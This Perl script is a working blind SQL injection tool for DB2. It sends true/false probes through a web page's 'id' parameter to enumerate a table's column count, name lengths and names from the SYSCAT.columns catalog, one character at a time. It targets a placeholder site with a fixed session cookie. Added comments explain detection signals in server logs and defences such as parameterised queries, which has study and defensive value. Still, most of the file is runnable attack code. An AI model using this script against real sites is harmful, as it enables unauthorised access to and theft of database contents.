#!/usr/bin/perl
#################
#step2.pl
#demo for DB2 inj
#################
# Blind (boolean-based) enumeration of column names from the DB2 catalog
# view SYSCAT.columns for one table, one true/false probe per HTTP request.
# Each probe appends a SQL condition to the `id` query parameter of $path
# and treats the presence of $string in the response body as "true".
#
# Defender notes:
#   - Every probe is a GET whose `id` parameter carries the literal text
#     " and (select ...", " and length((select ...", " AND ASCII((SELECT ...",
#     with references to SYSCAT.columns; these substrings in web-server
#     access logs are a direct detection signal for this script.
#   - Requests are strictly sequential with a 1-second sleep after each hit,
#     so a run produces a long, low-rate burst from one client with a fixed
#     User-Agent and a fixed session cookie (see sub check).
#   - The probe only works because the server-side query presumably
#     concatenates `id` into SQL; a parameterised query (or rejecting a
#     non-numeric `id`) stops the whole technique, and a database account that
#     cannot read the SYSCAT views stops the catalog enumeration specifically.
#
# Note: no `use strict; use warnings;` — all variables below are package
# globals, and `@ARGV[0]` is a one-element slice rather than the scalar
# `$ARGV[0]` (works, but would warn under `use warnings`).
use LWP::UserAgent;
# Injection point: the base URL whose `id` parameter receives the appended
# SQL. Site-specific value carried over from the original page.
$path = "http://www.site.com/visit/index.asp?id=6503";
# Marker text expected in the response body when the injected condition
# evaluates true (checked with a regex grep in sub check).
$string= "superhei";
$ARGC = @ARGV;                 # argument count; assigned but never read below
# Table whose column names are enumerated; first command-line argument.
$tabname= @ARGV[0];
#@ta=('AA_ASET_AVEPRICE','AA_HR_ABR_POLITICS_AUDI_EMP','AA_HR_ABR_POLITICS_AUDI_INFO','AA_JJJ','AA_JJJ_I','AA_JJJ_O');

# Step 1: find the highest column number of $tabname (tried for 1..19).
# $len stays undef if no probe matches, in which case `$iii<$len` below is
# `0 < 0` and the per-column loop runs zero times.
for($i=1;$i<20;$i++){
    $que = $path." and (select max(COLNo) from SYSCAT.columns where tabname='".$tabname."')=".$i;
    if ( &check($que) ){
        print "colno:".$i;
        $len = $i;
        last;
    }
}

# Step 2: for each column number 0..$len-1, first find the name length
# (tried for 1..9), then recover the name one character at a time.
for($iii=0;$iii<$len;$iii++){
    for($j=1;$j<10;$j++){
        $que = $path." and length((select COLNAME from SYSCAT.columns where tabname='".$tabname."' and colno=".$iii."))=".$j;
        if ( &check($que) ){
            sleep(1);
            # Upper bound for the position loop below (exclusive).
            # Not reset per column, so it keeps the previous column's value
            # when no length probe matches.
            $xxx=$j+1;
            # Prints "column <n> length <len>" (Chinese).
            print "第".$iii."个列长度".$j."\n";
            last;
        }
    }
    $tablex='';            # accumulates the recovered column name
    for($jj=1;$jj<$xxx;$jj++){
        # Probes code points 65..96 only ('A'..'Z' and the six characters
        # between 'Z' and 'a'); any other character is left unrecovered.
        for ($ii=65;$ii<97;$ii++){
            $que = $path." AND ASCII((SELECT (SUBSTR(COLNAME,".$jj.",1)) from SYSCAT.columns where tabname='".$tabname."' and colno=".$iii."))=".$ii;
            if ( &check($que) ){
                sleep(1);
                print chr($ii);
                $tablex=$tablex.chr($ii);
                last;
            }
        }
    }
    # Prints "column <n> name is <name>" (Chinese).
    print "\n第".$iii."个列名为".$tablex."\n";
}

# check($url): issue one GET for $url and return 1 if the response body
# matches /$string/, else 0. Prints the URL to STDOUT first.
# The `($)` prototype is bypassed by the `&check(...)` call syntax used
# above, so it has no effect on argument handling.
sub check($) {
    # Fixed request headers: the User-Agent, Accept-Language and the
    # hard-coded ASP session cookie are constant across all probes, which
    # makes the traffic easy to group in server logs.
    my @ns_headers = (
        'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
        'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*',
        'Accept-Language' => 'zh-cn',
        'Host' =>'www.site.com',
        'Connection' =>'Keep-Alive',
        'Cookie'=>'ASPSESSIONIDSAAQTTBR=OEHKJJOBBKAADNNPLKFCNEAL'
    );
    $http_query = $_[0];
    print "\r\n $http_query \r\n";
    # A fresh user agent per call; `or die` is effectively unreachable since
    # new() returns an object.
    $mcb_reguest = LWP::UserAgent->new() or die;
    $res = $mcb_reguest->get($http_query, @ns_headers);
    # content() returns the whole body as one scalar, so @results has a
    # single element and the grep below tests the entire body once.
    @results = $res->content;
    sleep(1);
    # $string is interpolated unescaped into the pattern; "superhei" has no
    # regex metacharacters, so this matches it literally.
    @num=grep /$string/, @results;
    #print @results;
    $size=@num;
    if ($size > 0) {
        return 1;
    }
    return 0;
}